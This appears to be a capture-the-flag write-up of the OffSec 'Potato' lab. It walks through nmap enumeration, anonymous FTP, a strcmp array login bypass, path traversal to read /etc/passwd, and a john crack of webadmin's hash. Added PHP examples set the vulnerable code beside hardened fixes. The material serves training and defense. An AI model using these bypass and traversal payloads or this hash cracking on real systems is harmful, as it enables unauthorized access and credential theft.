Offsec - Potato - June 4th 2023
Target is: [LAB_IP]
Autorecon takes way too long for me, so I'll run nmap for now.
nmap -sV -sC -p- -v [LAB_IP] --open -oN potato2.scan
I like knowing the serviceVersion and running nmap's sCripts on all ports in case they open some >ridiculous< port out there. -v is good for knowing whether the system crashed or not, and I only care about --open things.
Nmap scan report for [LAB_IP]
Host is up (0.071s latency).
Not shown: 61240 closed tcp ports (conn-refused), 4292 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 [HASH_REDACTED] (RSA)
| 256 [HASH_REDACTED] (ECDSA)
|_ 256 [HASH_REDACTED] (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
|_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.11 seconds
Now to check out the web port
Potato company
At the moment, there is nothing. This site is under construction. To make you wait, here is a photo of a potato:
Also wtf is up with this potato...
Now time to run directory scans on the web server.
I like the GUI of DirBuster, minus the button glitch, but I'm debating between dirb, for its ease of use, and gobuster.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /icons/ - 403
File found: /index.php - 200
Dir found: /admin/ - 200
File found: /admin/index.php - 200
Dir found: /icons/small/ - 403
Navigating to /admin/index.php
Now to check the weird FTP on 2112
ftp [LAB_IP] 2112
Connected to [LAB_IP].
220 ProFTPD Server (Debian) [::ffff:[LAB_IP]]
Name ([LAB_IP]:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@[LAB_IP] !
230-
230-The local time is: Sun Jun 04 12:10:41 2023
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||31513|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg
226 Transfer complete
ftp> get welcome.msg
ftp> get index.php.bak
→ cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
→ cat index.php.bak
Go to the dashboard"; setcookie('pass', $pass, time() + 365*24*3600); }else{ echo "Bad login/password! Return to the login page
"; } exit(); } ?>
So try admin:potato...
Bad user/password! Return to the login page
and it didn't take
Looking for ways to bypass their password authentication method yields this (databyte):
Basically, pass the password as an array via password[] rather than as the plain string the login expects.
Time to load up burp and shoot it over.
I opted to use Burp's browser so I get less of a headache with the FoxyProxy config.
And I'm logged in
Welcome! Go to the dashboard
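As an added example (not the lab's index.php, whose top half the backup does not show here), the following PHP shows why a password[] array parameter gets past the login. It assumes the login compares the submitted password with strcmp($_POST['password'], $pass) == 0, the usual cause of this bypass, that $pass is the hardcoded 'potato' the admin:potato attempt above was based on, and that the lab runs PHP 7.x, where strcmp() given an array only warns and returns NULL; the function names are made up here.

```php
<?php
// Added example, not code from the lab. Assumptions: the lab's login uses
// strcmp($_POST['password'], $pass) == 0 and $pass is the hardcoded 'potato'.
// On PHP 7.x strcmp() given an array emits a warning and returns NULL, and
// NULL == 0 is true under loose comparison, so password[]=anything logs in.
// PHP 8 throws a TypeError instead, which is caught below to keep the demo runnable.

const ADMIN_PASS = 'potato';   // assumed hardcoded value

/** Vulnerable check: loose comparison of strcmp()'s result. */
function login_vulnerable(array $post): bool
{
    if (!isset($post['username'], $post['password']) || $post['username'] !== 'admin') {
        return false;
    }
    try {
        return @strcmp($post['password'], ADMIN_PASS) == 0;   // NULL == 0 -> true on PHP 7
    } catch (TypeError $e) {
        return false;                                         // PHP 8 behaviour
    }
}

/** Hardened check: reject non-strings, then compare in constant time. */
function login_hardened(array $post): bool
{
    $user = $post['username'] ?? null;
    $pw   = $post['password'] ?? null;
    if (!is_string($user) || !is_string($pw)) {
        return false;   // password[] arrives as an array and is refused here
    }
    return $user === 'admin' && hash_equals(ADMIN_PASS, $pw);
}

// Constructed request bodies, as PHP decodes them into $_POST:
//   username=admin&password=wrong    -> ['username' => 'admin', 'password' => 'wrong']
//   username=admin&password[]=wrong  -> ['username' => 'admin', 'password' => ['wrong']]
$cases = [
    'wrong string' => ['username' => 'admin', 'password' => 'wrong'],
    'right string' => ['username' => 'admin', 'password' => 'potato'],
    'array bypass' => ['username' => 'admin', 'password' => ['wrong']],
];

foreach ($cases as $label => $post) {
    printf("%-13s vulnerable=%-5s hardened=%s\n", $label,
        var_export(login_vulnerable($post), true),
        var_export(login_hardened($post), true));
}
```

In Burp the same change is editing the login POST body from password=potato to password[]=potato. On PHP 7.x the array case prints vulnerable=true and hardened=false; on PHP 8 the vulnerable function prints false too, because the TypeError is caught, which is why the hardened version checks is_string() before comparing rather than relying on the runtime's strictness.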
Now in the admin dashboard I can see the following sections, with their respective data dumped:
HOME
Admin area
Access forbidden if you don't have permission to access
USERS
Users list:
- Admin
DATE
The curent time:
Sun Jun 4 12:48:50 UTC 2023
LOGS
Contents of file log_01.txt:
Operation: password change
Date: January 03, 2020 / 11:25 a.m.
User: admin
Status: OK
Contents of file log_02.txt:
Operation: reboot the server
Date: January 09, 2020 / 9:55 a.m.
User: admin
Status: OK
Contents of file log_03.txt:
Operation: password change
Date: August 2, 2020 / 9:25 p.m.
User: admin
Status: OK
So, since LOGS retrieves log files, I'll try to retrieve /etc/passwd through it.
Cool, so that worked. Now to crack the hash for webadmin:
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash
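The LOGS section behaves like a file read with a user-controlled file name, which is why a path to /etc/passwd comes back. As an added example (not the lab's dashboard code; the ?file= parameter and the logs/ directory are assumed names), here is that vulnerable pattern next to a hardened version, run against a constructed log file in a temp directory:

```php
<?php
// Added example, not the lab's dashboard code. Assumes the log viewer takes a
// file name in ?file= and reads it from a logs directory; both names are made up.

/** Vulnerable: the user-controlled name is concatenated straight into the path. */
function read_log_vulnerable(string $dir, string $name): ?string
{
    // ?file=../../../../../../etc/passwd resolves to /etc/passwd
    $data = @file_get_contents($dir . '/' . $name);
    return $data === false ? null : $data;
}

/** Hardened: allowlist the name, then confirm the resolved path stays inside $dir. */
function read_log_hardened(string $dir, string $name): ?string
{
    if (!preg_match('/^log_\d{2}\.txt$/', $name)) {
        return null;                        // only the expected names are accepted
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;                        // symlink or traversal escaped the directory
    }
    $data = @file_get_contents($path);
    return $data === false ? null : $data;
}

// Constructed demo: one log file in a throwaway directory.
$dir = sys_get_temp_dir() . '/potato_logs_' . getmypid();
mkdir($dir);
file_put_contents("$dir/log_01.txt", "Operation: password change\nUser: admin\nStatus: OK\n");

$requests = ['log_01.txt', '../../../../../../etc/passwd', 'log_99.txt'];
foreach ($requests as $name) {
    printf("%-30s vulnerable=%-5s hardened=%s\n", $name,
        read_log_vulnerable($dir, $name) === null ? 'null' : 'read',
        read_log_hardened($dir, $name) === null ? 'null' : 'read');
}

unlink("$dir/log_01.txt");
rmdir($dir);
```

On a Linux host the traversal line prints vulnerable=read hardened=null: the vulnerable function happily returns /etc/passwd, while the hardened one rejects the name before any filesystem call, and would still reject it via the realpath() prefix check even if the allowlist were loosened.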
Dump the hash into a file and run john to attempt to crack it:
→ vi hash
→ john hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
dragon (webadmin)
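To confirm the crack without trusting john's output, the $1$ hash can be recomputed with PHP's crypt(), which supports md5crypt natively. This added example (not part of the writeup or of john) parses the passwd line above, recomputes the hash for each word of a small constructed wordlist standing in for /usr/share/john/password.lst, and reports the match; all function names are made up here.

```php
<?php
// Added example, not john's code. Verifies the cracked password against the
// md5crypt hash from the passwd line above using PHP's crypt(), then runs the
// same dictionary loop john ran, over a small constructed wordlist.

/** Split a passwd/shadow-style line into [user, hash]. */
function parse_passwd_line(string $line): array
{
    $fields = explode(':', $line);
    return [$fields[0], $fields[1]];
}

/** Salt prefix crypt() needs to reproduce a $1$ hash: "$1$" . salt . "$". */
function md5crypt_salt(string $hash): string
{
    // $1$<salt>$<22 chars>: keep everything up to and including the third '$'
    return substr($hash, 0, strpos($hash, '$', 3) + 1);
}

/** Constant-time check of one candidate against the stored hash. */
function check_password(string $candidate, string $hash): bool
{
    return hash_equals($hash, crypt($candidate, md5crypt_salt($hash)));
}

/** Dictionary attack: return the matching word, or null if none matches. */
function crack(string $hash, iterable $wordlist): ?string
{
    foreach ($wordlist as $word) {
        $w = rtrim($word, "\r\n");          // tolerate lines read straight from a file
        if (check_password($w, $hash)) {
            return $w;
        }
    }
    return null;
}

// The line as retrieved through the LOGS file read above.
$line = 'webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash';
[$user, $hash] = parse_passwd_line($line);

// Constructed stand-in for /usr/share/john/password.lst.
$wordlist = ['123456', 'password', 'potato', 'dragon', 'letmein'];

$found = crack($hash, $wordlist);
echo $found === null ? "no match for $user\n" : "$found ($user)\n";
```

Running it prints the same "dragon (webadmin)" line john produced. The loop is exactly what john did in wordlist mode, minus the speed: md5crypt's 1000 MD5 rounds make each guess cost far more than a plain MD5, which is the point of the scheme, but a salt of "webadmin" against a dictionary word still falls in well under a second.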